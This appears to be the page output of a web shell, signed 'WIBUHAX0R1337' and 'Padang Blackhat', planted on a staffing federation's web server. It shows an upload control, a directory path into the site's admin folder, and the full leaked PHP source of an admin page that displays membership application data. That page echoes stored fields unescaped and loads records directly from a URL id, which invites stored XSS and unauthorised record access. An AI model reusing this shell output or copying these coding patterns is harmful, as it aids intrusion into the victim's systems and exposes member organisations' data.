-
✘✘✘ WIBUHAX0R1337 ✘✘✘
-
✘
PATCH :
/
home
/
indianstaffing
/
public_html
/
admin
/
Upload File:
files >> /home/indianstaffing/public_html/admin/view-membership-data.php
<?php include '../config.php'; include'include/header.php'; include'include/sidebar.php'; $date = date('D-M-Y'); $business_details_year = GetDataByID('business_details_year',10); if(isset($_GET['id'])){ $id = $_GET['id']; } $data = GetDataByID('membership_form',$id); ?> <style> .white-bg{ background:#fff; padding:50px; } label{ display: block; margin-bottom: .5rem; } input,textarea,select{ background: #f1f6fc; width: 100%; padding: 10px 18px; border: none; outline: none; border-radius: 0; color: #363636; font-size: 16px; } </style> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <div class="content-header"> <div class="container-fluid"> <div class="row mb-2"> <div class="col-sm-6"> <h1 class="m-0">View Member Data</h1> </div><!-- /.col --> <div class="col-sm-6"> <ol class="breadcrumb float-sm-right"> <li class="breadcrumb-item"><a href="<?= $weburl; ?>">Home</a></li> <li class="breadcrumb-item active">View Member Data</li> </ol> </div><!-- /.col --> </div><!-- /.row --> </div><!-- /.container-fluid --> </div> <!-- /.content-header --> <!-- Main content --> <section class="content"> <div class="container-fluid"> <!-- /.row --> <div class="row"> <div class="mx-auto col-lg-10 form-part white-bg"> <form class="contact-form" method="POST" action=""> <div class="row"> <div class="col-md-12 mb-0"> <div class="common-control form-group mb-0"> <h4 class="title mt-20" style="font-Weight:600;">About The Company </h4> </div> </div> <div class="col-md-12 mb-30"> <div class="common-control form-group mb-0"> <label for="" class="form-label"> Name*</label> <input type="text" name="company_name" placeholder="Name" required="" value="<?=$data->company_name?>"> </div> </div> <div class="col-md-6 mb-30"> <div class="common-control form-group mb-0"> <label for="" class="form-label"> Operations*</label> <select name="operation" id=""> <option value="In India Only" <?=$data->operation == 'In India Only'? 'selected':'' ?>>In India Only</option> <option value="Global Operations" <?=$data->operation == 'Global Operations'? 'selected':'' ?>>Global Operations</option> </select> </div> </div> <div class="col-md-6 mb-30"> <div class="common-control form-group mb-0"> <label for="" class="form-label"> Select*</label> <select name="company_type" id=""> <option value="Public" <?=$data->company_type == 'Public'? 'selected':'' ?>>Public</option> <option value="Institutional members" <?=$data->company_type == 'Private'? 'selected':'' ?>>Private</option> <option value="proprietorship" <?=$data->company_type == 'proprietorship'? 'selected':'' ?>>proprietorship</option> <option value="Joint Holding" <?=$data->company_type == 'Joint Holding'? 'selected':'' ?>>Joint Holding</option> </select> </div> </div> <div class="col-md-12 mb-30"> <div class="common-control form-group mb-0"> <label for="" class="form-label"> Address*</label> <input type="text" name="company_address" placeholder="Address" required="" value="<?=$data->company_address?>"> </div> </div> <div class="col-md-4 mb-30"> <div class="common-control form-group mb-0"> <label for="" class="form-label"> City/Town*</label> <input type="text" name="company_city" placeholder="City" required="" value="<?=$data->company_city?>"> </div> </div> <div class="col-md-4 mb-30"> <div class="common-control form-group mb-0"> <label for="" class="form-label"> Zip*</label> <input type="number" name="company_zip" placeholder="Zip" required="" value="<?=$data->company_zip?>"> </div> </div> <div class="col-md-4 mb-30"> <div class="common-control form-group mb-0"> <label for="" class="form-label"> Country*</label> <input type="text" name="company_country" placeholder="Country" required="" value="<?=$data->company_country?>"> </div> </div> <div class="row mb-0"> <div class="col-md-12 mb-0"> <div class="common-control form-group mb-0"> <h4 class="title mt-20" style="font-Weight:600;"> Primary Contact for ISF </h4> </div> </div> <div class="col-md-12 mb-30"> <div class="common-control form-group mb-0"> <label for="" class="form-label"> Name*</label> <input type="text" name="name" placeholder="Name" value="<?=$data->name?>" required> </div> </div> <div class="col-md-6 mb-30"> <div class="common-control form-group mb-0"> <label for="" class="form-label"> Designation*</label> <input type="text" name="designation" placeholder="Designation" value="<?=$data->designation?>" required> </div> </div> <div class="col-md-6 mb-30"> <div class="common-control form-group mb-0"> <label for="" class="form-label"> Email*</label> <input type="email" name="email" placeholder="Email" value="<?=$data->email?>" required> </div> </div> <div class="col-md-6 mb-30"> <div class="common-control form-group mb-0"> <label for="" class="form-label"> Mobile No.*</label> <input type="number" name="mobile" placeholder="Mobile No." value="<?=$data->mobile?>" required> </div> </div> <div class="col-md-6 mb-30"> <div class="common-control form-group mb-0"> <label for="" class="form-label"> Landline*</label> <input type="number" name="landline" placeholder="Landline" value="<?=$data->landline?>" required> </div> </div> </div> <h4 class="title" style="font-Weight:600;"> Key Business Leaders (Director/CXO level)</h4> <div class="row mb-0"> <div class="col-md-4 mb-0"> <span> Key Business Leader 1 </span> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"> Name*</label> <input type="text" name="leader1_name" placeholder="Name" value="<?=$data->leader1_name?>" required> </div> </div> <div class="col-md-4 mb-0"> <span> Key Business Leader 2 </span> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"> Name*</label> <input type="text" name="leader2_name" placeholder="Name" value="<?=$data->leader2_name?>" required> </div> </div> <div class="col-md-4 mb-0"> <span> Key Business Leader 3 </span> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"> Name*</label> <input type="text" name="leader3_name" placeholder="Name" value="<?=$data->leader3_name?>" required> </div> </div> <div class="col-md-4 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label">Designation*</label> <input type="text" name="leader1_designation" placeholder="Designation" value="<?=$data->leader1_designation?>" required> </div> </div> <div class="col-md-4 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label">Designation*</label> <input type="text" name="leader2_designation" placeholder="Designation" value="<?=$data->leader2_designation?>" required> </div> </div> <div class="col-md-4 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label">Designation*</label> <input type="text" name="leader3_designation" placeholder="Designation" value="<?=$data->leader3_designation?>" required> </div> </div> <div class="col-md-4 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label">Mobile NO.</label> <input type="number" name="leader1_mobile" placeholder="Mobile No." value="<?=$data->leader1_mobile?>" required=""> </div> </div> <div class="col-md-4 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label">Mobile NO.</label> <input type="number" name="leader2_mobile" placeholder="Mobile No." value="<?=$data->leader2_mobile?>" required=""> </div> </div> <div class="col-md-4 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label">Mobile NO.</label> <input type="number" name="leader3_mobile" placeholder="Mobile No." value="<?=$data->leader3_mobile?>" required=""> </div> </div> </div> <div class="row mt-20"> <div class="col-md-3 mb-0"> <span> Business Details </span> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"> Year(we Follow)</label> <select name="year_follow" id=""> <option value="Jan-Dec" <?=$data->year_follow == 'Jan-Dec'? 'selected':'' ?>>Jan-Dec</option> <option value="Apr-Mar" <?=$data->year_follow == 'Apr-Mar'? 'selected':'' ?>>Apr-Mar</option> <option value="Other" <?=$data->year_follow == 'Other'? 'selected':'' ?>>Other</option> </select> </div> </div> <div class="col-md-3 mb-0"> <span> <?=$business_details_year->year1?> </span> </div> <div class="col-md-3 mb-0"> <span> <?=$business_details_year->year2?> </span> </div> <div class="col-md-3 mb-0"> <span><?=$business_details_year->year3?></span> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label">Total India Turnover (in Cr)</label> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="india_turnover1" placeholder="" value="<?=$data->india_turnover1?>" required> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="india_turnover2" placeholder="" value="<?=$data->india_turnover2?>" required> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="india_turnover3" placeholder="" value="<?=$data->india_turnover3?>" required> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label">Internal Staff (Staffing SBU only)</label> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="internal_staff1" placeholder="" value="<?=$data->internal_staff1?>" required> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="internal_staff2" placeholder="" value="<?=$data->internal_staff2?>"> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="internal_staff3" placeholder="" value="<?=$data->internal_staff3?>"> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label">Staffing Business Turnover</label> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="staffing_turnover1" placeholder="" value="<?=$data->staffing_turnover1?>" required> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="staffing_turnover2" placeholder="" value="<?=$data->staffing_turnover2?>"> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="staffing_turnover3" placeholder="" value="<?=$data->staffing_turnover3?>"> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label">Staffing Associate Numbers (India)</label> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="staffing_asociate1" placeholder="" value="<?=$data->staffing_asociate1?>" required> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="staffing_asociate2" placeholder="" value="<?=$data->staffing_asociate2?>"> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="staffing_asociate3" placeholder="" value="<?=$data->staffing_asociate3?>"> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label">Employed & payrolled in the year</label> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="employed_year1" placeholder="" value="<?=$data->employed_year1?>"> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="employed_year2" placeholder="" value="<?=$data->employed_year2?>"> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="employed_year3" placeholder="" value="<?=$data->employed_year3?>"> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label">Active numbers at closing of year</label> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="active_number1" placeholder="" value="<?=$data->active_number1?>"> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="active_number2" placeholder="" value="<?=$data->active_number2?>"> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="active_number3" placeholder="" value="<?=$data->active_number3?>"> </div> </div> <div class="col-md-12 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label">Breakup of Active numbers at closing of year</label> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label">White collar</label> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="white_collar1" placeholder="" value="<?=$data->white_collar1?>"> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="white_collar2" placeholder="" value="<?=$data->white_collar2?>"> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="white_collar3" placeholder="" value="<?=$data->white_collar3?>"> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label">Blue Collar</label> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="blue_collar1" placeholder="" value="<?=$data->blue_collar1?>"> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="blue_collar2" placeholder="" value="<?=$data->blue_collar2?>"> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"></label> <input type="number" name="blue_collar3" placeholder="" value="<?=$data->blue_collar3?>"> </div> </div> </div> <div class="row mt-30"> <div class="col-md-12 mb-0"> <div class="common-control form-group mb-0 mt-3"> <h4 class="title mt-20" style="font-weight:600;">Business Operations </h4> </div> </div> <div class="col-md-12 mb-30"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label">Number of Locations of presence (operating Staffing Business)</label> <input type="number" name="no_of_location" placeholder="" value="<?=$data->no_of_location?>"> </div> </div> <div class="col-md-12 mb-30"> <div class="common-control form-group mb-0 mt-1"> <label for="" class="form-label">Leased/owned office premises exclusive to the organisation (of above)</label> <input type="number" name="leased_office" placeholder="" value="<?=$data->leased_office?>"> </div> </div> <div class="col-md-12 mb-30"> <div class="common-control form-group mb-0 mt-1"> <label for="" class="form-label">Resident business representatives without leased office (of above)</label> <input type="number" name="resident_office" placeholder="" value="<?=$data->resident_office?>"> </div> </div> </div> <div class="row"> <div class="col-md-12 mb-0"> <div class="common-control form-group mb-0"> <h4 class="title mt-20" style="font-Weight:600;">Parent company / holding company </h4> </div> </div> <div class="col-md-6 mb-30"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label">Name</label> <input type="text" name="holding_compnay" placeholder="Parent / Holding Company Name" value="<?=$data->holding_compnay?>"> </div> </div> <div class="col-md-6 mb-30"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"> Mode of Holding / Association</label> <input type="text" name="mode_of_holding" placeholder="Mode of Holding / Association" value="<?=$data->mode_of_holding?>"> </div> </div> </div> <div class="row"> <div class="col-md-12 mb-0"> <div class="common-control form-group mb-0"> <h4 class="title" style="font-Weight:600;">Statement of conduct of Business Practices</h4> </div> </div> <div class="col-md-12 mb-0"> <div class="common-control form-group mb-0"> <p>Please select "Yes" indicating your acceptance of your organisation's business practices. Please note that ISF may during the approval process or at any time during the membership tenure, audit your organisation's business practices.</p> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-3"> <select name="wages_act" id="" required> <option value="Yes" <?=$data->wages_act == 'Yes'? 'selected':'' ?>>Yes</option> <option value="No" <?=$data->wages_act == 'No'? 'selected':'' ?>>No</option> </select> </div> </div> <div class="col-md-9 mb-30"> <div class="common-control form-group mb-0 mt-3"> <label for="" class="form-label"> Our organisation adheres to Minimum Wages Act where applicable</label> </div> </div> <div class="col-md-3 mb-30"> <div class="common-control form-group mb-0 mt-1"> <select name="esic_act" id="" required> <option value="Yes" <?=$data->esic_act == 'Yes'? 'selected':'' ?>>Yes</option> <option value="No" <?=$data->esic_act == 'No'? 'selected':'' ?>>No</option> </select> </div> </div> <div class="col-md-9 mb-30"> <div class="common-control form-group mb-0 mt-1"> <label for="" class="form-label"> Our organisation adheres to ESIC Act where applicable</label> </div> </div> <div class="col-md-3 mb-30"> <div class="common-control form-group mb-0 mt-1"> <select name="clr_act" id="" required> <option value="Yes" <?=$data->clr_act == 'Yes'? 'selected':'' ?>>Yes</option> <option value="No" <?=$data->clr_act == 'No'? 'selected':'' ?>>No</option> </select> </div> </div> <div class="col-md-9 mb-30"> <div class="common-control form-group mb-0 mt-1"> <label for="" class="form-label"> Our organisation adheres to CLR Act where applicable</label> </div> </div> <div class="col-md-3 mb-30"> <div class="common-control form-group mb-0 mt-1"> <select name="fund_act" id="" required> <option value="Yes" <?=$data->fund_act == 'Yes'? 'selected':'' ?>>Yes</option> <option value="No" <?=$data->fund_act == 'No'? 'selected':'' ?>>No</option> </select> </div> </div> <div class="col-md-9 mb-30"> <div class="common-control form-group mb-0 mt-1"> <label for="" class="form-label"> Our organisation adheres to Provident Fund Act where applicable</label> </div> </div> <div class="col-md-3 mb-30"> <div class="common-control form-group mb-0 mt-1"> <select name="gratuity_act" id="" required> <option value="Yes" <?=$data->gratuity_act == 'Yes'? 'selected':'' ?>>Yes</option> <option value="No" <?=$data->gratuity_act == 'No'? 'selected':'' ?>>No</option> </select> </div> </div> <div class="col-md-9 mb-30"> <div class="common-control form-group mb-0 mt-1"> <label for="" class="form-label"> Our organisation adheres to Gratuity Act where applicable</label> </div> </div> <div class="col-md-3 mb-30"> <div class="common-control form-group mb-0 mt-1"> <select name="bonus_act" id="" required> <option value="Yes" <?=$data->bonus_act == 'Yes'? 'selected':'' ?>>Yes</option> <option value="No" <?=$data->bonus_act == 'No'? 'selected':'' ?>>No</option> </select> </div> </div> <div class="col-md-9 mb-30"> <div class="common-control form-group mb-0 mt-1"> <label for="" class="form-label"> Our organisation adheres to Payment of Bonus Act where applicable</label> </div> </div> <div class="col-md-3 mb-30"> <div class="common-control form-group mb-0 mt-1"> <select name="employee_benefits" id="" required> <option value="Yes" <?=$data->employee_benefits == 'Yes'? 'selected':'' ?>>Yes</option> <option value="No" <?=$data->employee_benefits == 'No'? 'selected':'' ?>>No</option> </select> </div> </div> <div class="col-md-9 mb-30"> <div class="common-control form-group mb-0 mt-1"> <label for="" class="form-label"> Our organisation offers all statutary Employee benefits where applicable</label> </div> </div> <div class="col-md-3 mb-30"> <div class="common-control form-group mb-0 mt-1"> <select name="law_of_land" id="" required> <option value="Yes" <?=$data->law_of_land == 'Yes'? 'selected':'' ?>>Yes</option> <option value="No" <?=$data->law_of_land == 'No'? 'selected':'' ?>>No</option> </select> </div> </div> <div class="col-md-9 mb-30"> <div class="common-control form-group mb-0 mt-1"> <label for="" class="form-label"> Our organisation follows the law of the land</label> </div> </div> </div> <div class="row"> <div class="col-md-12 mb-0"> <div class="common-control form-group mb-0 mt-1"> <h4 class="title mt-20" style="font-weight:600;"> ISF Code of Conduct</h4> </div> </div> <div class="col-md-12 mb-30"> <div class="common-control form-group mb-0 mt-1"> <ul style="list-style-type: disc;"> <li>To comply with the Laws of the Land</li> <li>To respect candidate privacy, and provide fair treatment</li> <li>To not charge any service fee from candidates for recruitment services</li> <li>To respect healthy competition</li> <li>To not use the membership of ISF for commercial advantage </li> <li> To treat information shared and exchanged with utmost confidentiality</li> <li>To provide a true and correct representation of our services to the clients as well as candidates.</li> </ul> </div> </div> <div class="col-md-3 mb-0"> <div class="common-control form-group mb-0 mt-1"> <select name="code_of_conduct" id="" required> <option value="Yes" <?=$data->code_of_conduct == 'Yes'? 'selected':'' ?>>Yes</option> <option value="No" <?=$data->code_of_conduct == 'No'? 'selected':'' ?>>No</option> </select> </div> </div> <div class="col-md-9 mb-30"> <div class="common-control form-group mb-0 mt-1"> <h6 class="title mt-20" style="font-Weight:600;"> Declaration of Acceptance of ISF Code of Conduct</h6> </div> </div> </div> <div class="row"> <div class="col-md-12 mb-0"> <div class="common-control form-group mb-0 mt-1"> <h4 class="title mt-20" style="font-weight:600;"> Documents for Verification </h4> </div> </div> <div class="col-md-3 mb-30"> <div class="common-control form-group mb-0 mt-1"> <select name="mail_doc" id=""> <option value="Yes" <?=$data->mail_doc == 'Yes'? 'selected':'' ?>>Yes</option> <option value="No" <?=$data->mail_doc == 'No'? 'selected':'' ?>>No</option> </select> </div> </div> <div class="col-md-9 mb-30"> <div class="common-control form-group mb-0 mt-1"> <h4 class="title mt-20" style="font-Weight:600;"> Mail the documents on (info@indianstaffingfederation.org)</h4> </div> </div> </div> <div class="row mb-30"> <div class="col-md-12 mb-0"> <div class="common-control form-group mb-0 mt-1"> <h4 class="title mt-20" style="font-weight:600;"> Declaration</h4> </div> </div> <div class="col-md-12 mb-0"> <div class="common-control form-group mb-0 mt-0"> <p> I declare that all the information provided in the application form is correct as per company records and to my knowledge. The information provided will be subject to an assessment or audit that may be conducted by ISF if need be. I also understand that the decision for Approval / Non-approval of my membership to ISF will be the decision of the Board of ISF and I shall abide by the same.</p> </div> </div> <div class="col-md-4 mb-30"> <div class="common-control form-group mb-0 mt-1"> <label for="" class="form-label"> Date</label> <input type="date" name="date" placeholder="" value="<?=$data->date?>"> </div> </div> <div class="col-md-4 mb-30"> <div class="common-control form-group mb-0 mt-1"> <label for="" class="form-label">Place</label> <input type="text" name="place" placeholder="Place" value="<?=$data->place?>"> </div> </div> <div class="col-md-4 mb-30"> <div class="common-control form-group mb-0 mt-1"> <label for="" class="form-label">Signature</label> <input type="text" name="signature" placeholder="Signature" value="<?=$data->signature?>"> </div> </div> </div> </div> </form> </div> </div> </div> </section> </div> <?php include'include/footer.php'; ?>
2022 - 2023 Copyright By Lutfifakee || Padang Blackhat ♥